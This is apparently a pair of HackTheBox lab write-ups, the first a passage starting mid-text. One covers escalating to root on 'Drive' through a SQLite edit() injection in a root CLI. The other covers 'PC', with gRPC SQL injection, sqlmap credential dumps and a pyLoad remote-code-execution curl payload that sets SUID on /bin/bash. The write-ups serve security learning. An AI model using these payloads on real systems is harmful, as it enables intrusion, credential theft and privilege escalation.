0x5c7b2f7c20270a00; local_21 = 0x3b; local_38 = 0; do { sVar2 = strlen(param_1); if (sVar2 <= (ulong)(long)local_38) { param_1[local_3c] = '\0'; if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return; } bVar1 = false; for (local_30 = 0; local_30 < 9; local_30 = local_30 + 1) { if (param_1[local_38] == *(char *)((long)&local_29 + (long)(int)local_30)) { bVar1 = true; break; } } if (!bVar1) { param_1[local_3c] = param_1[local_38]; local_3c = local_3c + 1; } local_38 = local_38 + 1; } while( true ); } This is sanitize_string function which accepts string and removes bad characters these bad characters are represnted as 0x5c7b2f7c20270a00 & 0x3b which are \{/| '\n\00; main_menu void main_menu(void) { long in_FS_OFFSET; char local_28 [24]; undefined8 local_10; local_10 = *(undefined8 *)(in_FS_OFFSET + 0x28); fflush((FILE *)stdin); do { putchar(10); puts("doodleGrive cli beta-2.2: "); puts("1. Show users list and info"); puts("2. Show groups list"); puts("3. Check server health and status"); puts("4. Show server requests log (last 1000 request)"); puts("5. activate user account"); puts("6. Exit"); printf("Select option: "); fgets(local_28,10,(FILE *)stdin); switch(local_28[0]) { case '1': show_users_list(); break; case '2': show_groups_list(); break; case '3': show_server_status(); break; case '4': show_server_log(); break; case '5': activate_user_account(); break; case '6': puts("exiting..."); /* WARNING: Subroutine does not return */ exit(0); default: puts("please Select a valid option..."); } } while( true ); } as we see there are different options and each option has its own function but after examining them I’m interested in activate_user_account activate_user_account void activate_user_account(void) { size_t sVar1; long in_FS_OFFSET; char username [48]; char local_118 [264]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); printf("Enter username to activate account: "); fgets(username,0x28,(FILE *)stdin); sVar1 = strcspn(username,"\n"); username[sVar1] = '\0'; if (username[0] == '\0') { puts("Error: Username cannot be empty."); } else { sanitize_string(username); snprintf(local_118,0xfa, "/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SE T is_active=1 WHERE username=\"%s\";\'" ,username); printf("Activating account for user \'%s\'...\n",username); system(local_118); } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return; } I think it’s interesting because it takes an input from us which is the username and this input is put within the query The only obstacle is sanitize_string function applied on this username after search here i found that SQL functions that have potentially harmful side-effects, such as edit(), fts3_tokenizer(), load_extension(), readfile() and writefile(). After examining edit() i found that it can open an editor and from it we can run command as root First we will open the cli using this command VISUAL=/usr/bin/vim ./doodleGrive-cli because in the documentation of edit() function you will see that the editor can be chosen by making it the value if VISUAL environment variable To bypass the sanitize_string function the payload will be "&edit(username)-- - and it gives us vim editor at which we can type :!/bin/bash as shown and congratz you are root now you can get the flag root@drive:~# /usr/bin/id uid=0(root) gid=0(root) groups=0(root),1003(tom) root@drive:~# /usr/bin/cat /root/root.txt ********************************
HackTheBox · 2024-02-20
PC
Description Solution Recon Applying nmap scan ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/PC] └─$ nmap -sV -sC -Pn -p 80,50051 -oA pc 10.10.11.214 # Nmap 7.92 scan initiated Thu Aug 17 12:37:10 2023 as: nmap -sV -sC -Pn -p- -oA pc 10.10.11.214 Nmap scan report for 10.10.11.214 Host is up (0.075s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA) | 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA) |_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519) 50051/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port50051-TCP:V=7.92%I=7%D=8/17%Time=64DDF8D7%P=x86_64-pc-linux-gnu%r(N SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0 SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0 SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\ SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\ SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0 SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0 SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\ SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0 SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\ SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0 SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0 SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0 SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\? SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0 SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\ SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\ SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\ SF:0\0\0\0\0\?\0\0"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Aug 17 12:39:34 2023 -- 1 IP address (1 host up) scanned in 143.38 seconds We got this as an output. We have an interesting service on port 50051 After searching about 50051, we will find that the service is gRPC. Shell as sau To access its UI there’s a tool called grpcui explained here After installing it, we will get access to this GUI. In the method name field we have 3 options: Login,Register and getinfo Make sure that burp is opened and receiving the requests. Let’s try registering using credentials youssif:youssif Then login using these credentials and you will get this response. We see that we got an id and token. Let’s go to getinfo and use the id we got 345 => we got this msg So we will add the token we got in the metadata field and we will get in the response => “message”: “Will update soon.” We were using burp let’s go to the requests and send them to the repeater to examine them. getinfo request is most interesting of them and id parameter is vulnerable to sqli and it can be detected using id="345 or 1=1-- u will get a different message. Let’s go to sqlmap and because this request method is POST so we will copy the request in text file and use it with sqlmap, for more information here So from the previous link we knew that we will save the request in a file and use this command. sqlmap -r request.txt -p id --tables From this we knew that we have two tables accounts and messages, We are interested in Accounts table. Anyway Let’s dump the table using this command. sqlmap -r request.txt -p id -T accounts --dump in the output we will find this passwords are plain text and the user sau seems to be out goal Actually, IDK what is the pronounce of this name it seems like Siuuuuuuuuuuuuuuuuu Anyway, when we use this credentials of sau in ssh we get the shell successfully Congratzzzz we got the user’s flag shell as root Let’s move to Root part. after some enumeration using netstat -a I found that 127.0.0.1:8000 in listening state. We will use port forwarding to be able to access it using the command ssh -L 9001:127.0.0.1:8000 sau@10.10.11.214 So we can access it from firefox using the url http://127.0.0.1:9001 We will find that the process is called pyload and after enumerating the running processes using ps -ef we will find that it’s running process by the root. After searching for exploit for pyload i found many useful articles like: 1 2 3 All of these are useful i used this POC for the RCE:- curl -i -s -k -X $'POST' --data-binary $'jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%63%68%6d%6f%64%20%75%2b%73%20%2f%62%69%6e%2f%62%61%73%68%22%29;f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' $'http://127.0.0.1:4444/flash/addcrypted2' The url encoded part: %70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%63%68%6d%6f%64%20%75%2b%73%20%2f%62%69%6e%2f%62%61%73%68%22%29 is the command i used which is pyimport os;os.system(“chmod u+s /bin/bash”) Then we can execute /bin/bash -p using the user sau because /bin/bash got SUID permission. Rooted !! I wish this writeup was useful, THANK YOU.
HackTheBox · 2024-02-09

Touch background to close